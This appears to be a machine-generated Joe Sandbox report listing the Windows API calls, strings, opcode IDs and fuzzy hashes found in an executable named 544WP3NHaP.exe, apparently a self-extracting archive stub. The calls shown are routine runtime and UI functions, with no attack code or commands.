                                                                                                                                  • Instruction ID: 513d7cc20ad7496c6f4b0ce9ce7b3bd91a36b5871381e491633d4a2a716c4469
                                                                                                                                  • Opcode Fuzzy Hash: 26279a25dd0b7b237db7708aa4ea4a50a5693b0f320949f028683a186a98f56c
                                                                                                                                  • Instruction Fuzzy Hash: 2FF0CD3179162A9F9B224FA46C84AE623D8FE37755304063AE942D3340EB24CC50EA92
                                                                                                                                  APIs
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008B14C2
                                                                                                                                    • Part of subcall function 008AB146: GetVersionExW.KERNEL32(?), ref: 008AB16B
                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008B14E6
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008B1500
                                                                                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 008B1513
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008B1523
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008B1533
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2092733347-0
                                                                                                                                  • Opcode ID: 96d91c374327680661b16102a9c2e2b4be0a47146e8cd9fc39331bf96ffa42e4
                                                                                                                                  • Instruction ID: fff0971cb47d7e9907b358d78d0227d35cfd3ffd2b19f47d627f74d310cd24cd
                                                                                                                                  • Opcode Fuzzy Hash: 96d91c374327680661b16102a9c2e2b4be0a47146e8cd9fc39331bf96ffa42e4
                                                                                                                                  • Instruction Fuzzy Hash: F531E875108346ABC704DFA8C88499BBBF8FF98714F404A1EF999C3210E730D549CBA6
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,008C2AF1,008C02FC,008BFA34), ref: 008C2B08
                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008C2B16
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008C2B2F
                                                                                                                                  • SetLastError.KERNEL32(00000000,008C2AF1,008C02FC,008BFA34), ref: 008C2B81
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,008E1030,008C4674,008E1030,?,?,008C3F73,00000050,?,008E1030,00000200), ref: 008C97E9
                                                                                                                                  • _free.LIBCMT ref: 008C981C
                                                                                                                                  • _free.LIBCMT ref: 008C9844
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,008E1030,00000200), ref: 008C9851
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,008E1030,00000200), ref: 008C985D
                                                                                                                                  • _abort.LIBCMT ref: 008C9863
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 008BDC47
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008BDC61
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BDC72
                                                                                                                                  • TranslateMessage.USER32(?), ref: 008BDC7C
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 008BDC86
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 008BDC91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2148572870-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008B05DA: _wcslen.LIBCMT ref: 008B05E0
                                                                                                                                    • Part of subcall function 008AB92D: _wcsrchr.LIBVCRUNTIME ref: 008AB944
                                                                                                                                  • _wcslen.LIBCMT ref: 008AC197
                                                                                                                                  • _wcslen.LIBCMT ref: 008AC1DF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$_wcsrchr
                                                                                                                                  • String ID: .exe$.rar$.sfx
                                                                                                                                  • API String ID: 3513545583-31770016
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000800,?), ref: 008BCE9D
                                                                                                                                    • Part of subcall function 008AB690: _wcslen.LIBCMT ref: 008AB696
                                                                                                                                  • _swprintf.LIBCMT ref: 008BCED1
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000066,008E946A), ref: 008BCEF1
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 008BCFFE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                                  • String ID: %s%s%u
                                                                                                                                  • API String ID: 110358324-1360425832
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 008ABB27
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,008AA275,?,?,00000800,?,008AA23A,?,008A755C), ref: 008ABBC5
                                                                                                                                  • _wcslen.LIBCMT ref: 008ABC3B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$CurrentDirectory
                                                                                                                                  • String ID: UNC$\\?\
                                                                                                                                  • API String ID: 3341907918-253988292
                                                                                                                                  APIs
                                                                                                                                  • LoadBitmapW.USER32(00000065), ref: 008BB6ED
                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 008BB712
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 008BB744
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 008BB767
                                                                                                                                    • Part of subcall function 008BA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,008BB73D,00000066), ref: 008BA6D5
                                                                                                                                    • Part of subcall function 008BA6C2: SizeofResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA6EC
                                                                                                                                    • Part of subcall function 008BA6C2: LoadResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA703
                                                                                                                                    • Part of subcall function 008BA6C2: LockResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA712
                                                                                                                                    • Part of subcall function 008BA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,008BB73D,00000066), ref: 008BA72D
                                                                                                                                    • Part of subcall function 008BA6C2: GlobalLock.KERNEL32(00000000), ref: 008BA73E
                                                                                                                                    • Part of subcall function 008BA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 008BA762
                                                                                                                                    • Part of subcall function 008BA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 008BA7A7
                                                                                                                                    • Part of subcall function 008BA6C2: GlobalUnlock.KERNEL32(00000000), ref: 008BA7C6
                                                                                                                                    • Part of subcall function 008BA6C2: GlobalFree.KERNEL32(00000000), ref: 008BA7CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                  • String ID: ]
                                                                                                                                  • API String ID: 1797374341-3352871620
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 008BD64B
                                                                                                                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 008BD661
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 008BD675
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000068), ref: 008BD684
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                                                  • String ID: RENAMEDLG
                                                                                                                                  • API String ID: 445417207-3299779563
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008C7E24,00000000,?,008C7DC4,00000000,008DC300,0000000C,008C7F1B,00000000,00000002), ref: 008C7E93
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008C7EA6
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,008C7E24,00000000,?,008C7DC4,00000000,008DC300,0000000C,008C7F1B,00000000,00000002), ref: 008C7EC9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008B081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008B0836
                                                                                                                                    • Part of subcall function 008B081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008AF2D8,Crypt32.dll,00000000,008AF35C,?,?,008AF33E,?,?,?), ref: 008B0858
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 008AF2E4
                                                                                                                                  • GetProcAddress.KERNEL32(008E81C8,CryptUnprotectMemory), ref: 008AF2F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                  • API String ID: 2141747552-1753850145
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustPointer$_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2252061734-0
                                                                                                                                  APIs
                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 008CBF39
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008CBF5C
                                                                                                                                    • Part of subcall function 008C8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008CCA2C,00000000,?,008C6CBE,?,00000008,?,008C91E0,?,?,?), ref: 008C8E38
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008CBF82
                                                                                                                                  • _free.LIBCMT ref: 008CBF95
                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008CBFA4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,008C91AD,008CB188,?,008C9813,00000001,00000364,?,008C3F73,00000050,?,008E1030,00000200), ref: 008C986E
                                                                                                                                  • _free.LIBCMT ref: 008C98A3
                                                                                                                                  • _free.LIBCMT ref: 008C98CA
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,008E1030,00000200), ref: 008C98D7
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,008E1030,00000200), ref: 008C98E0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008B11CF: ResetEvent.KERNEL32(?), ref: 008B11E1
                                                                                                                                    • Part of subcall function 008B11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008B11F5
                                                                                                                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 008B0F21
                                                                                                                                  • CloseHandle.KERNEL32(?,?), ref: 008B0F3B
                                                                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 008B0F54
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 008B0F60
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 008B0F6C
                                                                                                                                    • Part of subcall function 008B0FE4: WaitForSingleObject.KERNEL32(?,000000FF,008B1206,?), ref: 008B0FEA
                                                                                                                                    • Part of subcall function 008B0FE4: GetLastError.KERNEL32(?), ref: 008B0FF6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1868215902-0
                                                                                                                                  • Opcode ID: 5c6c8182401eb6761ec32ee86c205ee492794389e1d5795e187a144e7d01e9cd
                                                                                                                                  • Instruction ID: ce62fac16b74948a7e591d41019dbdffde502cedc988c0565f350406b71e490d
                                                                                                                                  • Opcode Fuzzy Hash: 5c6c8182401eb6761ec32ee86c205ee492794389e1d5795e187a144e7d01e9cd
                                                                                                                                  • Instruction Fuzzy Hash: 40017571501B44EFC7229B64DC84BC6FBA9FB08710F000A2AF16BD22A0CB757A45CB55
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 008CC817
                                                                                                                                    • Part of subcall function 008C8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?), ref: 008C8DE2
                                                                                                                                    • Part of subcall function 008C8DCC: GetLastError.KERNEL32(?,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?,?), ref: 008C8DF4
                                                                                                                                  • _free.LIBCMT ref: 008CC829
                                                                                                                                  • _free.LIBCMT ref: 008CC83B
                                                                                                                                  • _free.LIBCMT ref: 008CC84D
                                                                                                                                  • _free.LIBCMT ref: 008CC85F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 20c6fc0169b33c9601ccf7640cad2e40cc80ae797637ee3b78648f91d9ec9652
                                                                                                                                  • Instruction ID: 7ad0acbb6e625e774ca5659d49b4b0f159d0e142c37f798f66cd18f4e9be1f18
                                                                                                                                  • Opcode Fuzzy Hash: 20c6fc0169b33c9601ccf7640cad2e40cc80ae797637ee3b78648f91d9ec9652
                                                                                                                                  • Instruction Fuzzy Hash: 8BF0F932545200EBC620EB6DF886E1B73F9FA00754765192EF249DB592CB70FC808B65
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 008B1FE5
                                                                                                                                  • _wcslen.LIBCMT ref: 008B1FF6
                                                                                                                                  • _wcslen.LIBCMT ref: 008B2006
                                                                                                                                  • _wcslen.LIBCMT ref: 008B2014
                                                                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,008AB371,?,?,00000000,?,?,?), ref: 008B202F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$CompareString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3397213944-0
                                                                                                                                  • Opcode ID: 07af273297a406de9c2d9e341d930d1d7c0465d50d380795a4071ede560cb762
                                                                                                                                  • Instruction ID: 6271f89766ed120c5e914f86a6a7a7b5d230e7d1b89188c825109d8ebb543b86
                                                                                                                                  • Opcode Fuzzy Hash: 07af273297a406de9c2d9e341d930d1d7c0465d50d380795a4071ede560cb762
                                                                                                                                  • Instruction Fuzzy Hash: 2BF01D32008018BBCF226F55EC09ECA7F26FB44770B11C419F61A9B462CB72D662D791
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 008C891E
                                                                                                                                    • Part of subcall function 008C8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?), ref: 008C8DE2
                                                                                                                                    • Part of subcall function 008C8DCC: GetLastError.KERNEL32(?,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?,?), ref: 008C8DF4
                                                                                                                                  • _free.LIBCMT ref: 008C8930
                                                                                                                                  • _free.LIBCMT ref: 008C8943
                                                                                                                                  • _free.LIBCMT ref: 008C8954
                                                                                                                                  • _free.LIBCMT ref: 008C8965
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: f9c57b54ff67c18fcc2af1409c49818cab48ac2e47b06f35e29e2438dbaf8cce
                                                                                                                                  • Instruction ID: 250f70ea3aef53da50dc3eb0c2ddd93f583a629cfeeadad2957ad7dbb8267de4
                                                                                                                                  • Opcode Fuzzy Hash: f9c57b54ff67c18fcc2af1409c49818cab48ac2e47b06f35e29e2438dbaf8cce
                                                                                                                                  • Instruction Fuzzy Hash: 97F0DA7686A222DFC64A7F5CFC069157FB1F724754302061BF625D72B1CF328945AB82
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _swprintf
                                                                                                                                  • String ID: %ls$%s: %s
                                                                                                                                  • API String ID: 589789837-2259941744
                                                                                                                                  • Opcode ID: 8a7ba43e76a760cb502d48feb054de4de5dd35456330d32dd16253f47475793b
                                                                                                                                  • Instruction ID: f73c5d662414c280198e720f9d256d906df664c709d148d7e0178cc1215c5474
                                                                                                                                  • Opcode Fuzzy Hash: 8a7ba43e76a760cb502d48feb054de4de5dd35456330d32dd16253f47475793b
                                                                                                                                  • Instruction Fuzzy Hash: E2510931244308F6FE1116948C6EFE67755FB27B08FA44916F396ED6E1C9A2A410A70F
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\544WP3NHaP.exe,00000104), ref: 008C7FAE
                                                                                                                                  • _free.LIBCMT ref: 008C8079
                                                                                                                                  • _free.LIBCMT ref: 008C8083
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                  • String ID: C:\Users\user\Desktop\544WP3NHaP.exe
                                                                                                                                  • API String ID: 2506810119-2042405535
                                                                                                                                  • Opcode ID: 51313a5826cc7251514c9e5f3b2f0b19eccb63fd65392a206cffdcac7836641b
                                                                                                                                  • Instruction ID: 8bc96d358f97b980fc10f756db48952725886504cc1eafb7e4ca381923b05ae4
                                                                                                                                  • Opcode Fuzzy Hash: 51313a5826cc7251514c9e5f3b2f0b19eccb63fd65392a206cffdcac7836641b
                                                                                                                                  • Instruction Fuzzy Hash: E7317A71A44618EFDB21DB999885EAEBBB8FB95310F1040AEF904D7211DB71CA44CB62
                                                                                                                                  APIs
                                                                                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008C31FB
                                                                                                                                  • _abort.LIBCMT ref: 008C3306
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer_abort
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 948111806-2084237596
                                                                                                                                  • Opcode ID: 6073dbc74c230fcb30d8c06a4088e242ccb2214e3cba20ebe68c4b45371599dc
                                                                                                                                  • Instruction ID: d41e46c20468633dadf84af8bdddd7c6a4b64027ff21f91c02efff3b4e7b4aeb
                                                                                                                                  • Opcode Fuzzy Hash: 6073dbc74c230fcb30d8c06a4088e242ccb2214e3cba20ebe68c4b45371599dc
